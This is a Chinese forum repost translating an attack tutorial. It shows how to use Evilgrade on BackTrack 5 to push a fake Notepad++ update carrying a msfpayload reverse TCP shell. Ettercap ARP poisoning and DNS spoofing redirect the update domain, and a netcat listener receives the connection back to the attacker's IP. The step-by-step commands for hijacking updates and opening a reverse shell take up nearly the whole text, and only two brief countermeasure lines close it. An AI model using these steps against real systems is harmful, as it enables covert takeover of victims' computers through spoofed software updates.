首先声明下,这是我转转自红盟的一篇文章,原文链接在这里:
这篇文章是我无意中看见的evligrade的一个利用教程,由于是英文的所以翻译给大家看看!感觉对大家的认识和提高都有很多的作用,其实漏洞无处不在!开拓我们的思维,才是关键!
好了,废话不多说!
---------------------------------------------------
此文摘自:
作者:Vishnu Valentino
翻译:L.N.
题目:在backtrack5上用Evilgrade工具15步**windows
文章类型:辅导类
难度:中高级
evilgrade简介:
evilgrade是一个模块化的框架结构,使用者可以利用脆弱的软件的升级更新机制,来欺骗用户安装自己注入的其他程序(***、病毒)。它提供了代理和默认快速配置,还有web服务和dns服务模块,可以很容易的更新设置,并且还可以自动配置新的代理!
来自:
使用工具:
1. Evilgrade
2. Backtrack 5
步骤:
1.解压evilgrade然后运行它用下面的命令
- tar xvfz isr-evilgrade-2.0.0.tar.gz
- cd isr-evilgrade-2.0.0.tar.gz/
- ./evilgrade
如果你在使用evilgrade的时候出现了错误,你可以参考这篇文章
下面显示的这个图片是你正确运行时的样子
2.下一步你需要去确定一个应用的目标程序,因为evilgrade将创建一个假的更新注入到目标电脑。使用下面的命令查看可以支持应用的模块。
- evilgrade>show modules
(命令是show modules,不要evilgrade>也输入进去了,这个便是当前的目录)
- List of modules:
- ===============
- allmynotes
- amsn
- appleupdate
- apptapp
- apt
- atube
- autoit3
- bbappworld
- blackberry
- bsplayer
- ccleaner
- clamwin
- cpan
- cygwin
- dap
- divxsuite
- express_talk
- fcleaner
- filezilla
- flashget
- flip4mac
- freerip
- getjar
- gom
- googleanalytics
- growl
- isopen
- istat
- itunes
- jet
- jetphoto
- miranda
- mirc
- nokia
- nokiasoftware
- notepadplus
- openoffice
- opera
- orbit
- osx
- paintnet
- panda_antirootkit
- photoscape
- quicktime
- skype
- sparkle
- speedbit
- sunbelt
- sunjava
- superantispyware
- teamviewer
- techtracker
- trillian
- ubertwitter
- vidbox
- virtualbox
- vmware
- winamp
- winscp
- winupdate
- winzip
- yahoomsn
- - 63 modules available.
在这篇辅导文章中,我将使用的目标程序是notepad plus,因此当管理员不加思索的升级这个应用程序的时候,他讲掉进我的陷阱里面。使用这个模块,运行以下命令:
- evilgrade>configure notepadplus
3.查看选项,你可以使用show options这个命令
在上面的图片中,virtualhost是当管理员升级他的notepad plus时,就会打开这个url连接:notepad-plus.sourceforge.net。下面我们将使用到这个连接。
4.接下来我们设置一个代理。我们配置一个代理用msfpayload创建一个shell_reverse_tcp
- evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'
解释:
/pentest/exploits/framework3/msfpayload –> 我们将加载这个msfpayload
windows/shell_reverse_tcp –> 当成功的时候我们就可以反弹一个shell回本地
LHOST –> localhost 你backtrack5的ip地址 / ***者的ip地址.
LPORT –> 填一个端口(用于监听) (相关的说明可以看)
5.下一步是我们打开evilgrade服务。确保你的80端口是打开的
6.完成了evilgrade得设置过后,我们还需要配置中间人***用ettercap,然后当当管理员升级notpad plus时就会直接连接evilgrade服务。第一步是你需要配置etter.dns
- pico /usr/share/ettercap/etter.dns
notepad-plus.sourceforge.net –> 这个地址是我们在第三步得到的
7.接下来我们要用到ettercap
“ettercap是什么见”
运行ettercap,打开新的terminal(ctrl+alt+t)运行下面的命令
- ettercap -G
Click Sniff –> Unified sniffing –> 选着你的网卡,在这儿我用eth0.
8.下一步我们需要使用dns_spoof插件,这个插件用于接收目标机器对evilgrade服务的请求。点击 Plugins –> Manage the plugins –> 双击 dns_spoof
9.下一步是扫描主机,这部是我们去决定一个目标,点击Hosts –> Scan for
10.下面是我们网络中得所有主机,我们需要建议一个目标
11.我们还需要去完成中间者***去拦截网络中得数据,点击 Mitm –> Arp poisoning –> 点击 "Sniff remote connection".
12.如果上面的每一步都设置正确,就运行ettercap开始嗅探start sniffing
13.接下来我们用nc(netcat)去监听端口1234(这个端口就是我们上面设置的那个)
nc是什么我就不多说了不知道的见:From :
新打开一个terminal(ctrl+alt+t)并且运行命令
- nc -l -v -p 1234
14.当管理员打开notepad plus时就会被要求升级更新,如下面的图,如果管理员点击yes,就成功了
15.我们的nc就会有东西回显了,因为当管理员点击yes升级完成的时候,我们反弹的shell就成功了
应对方法:
1.直接到官方网站下载最新版本的程序
2.保持反病毒程序是最新的
希望对你有帮助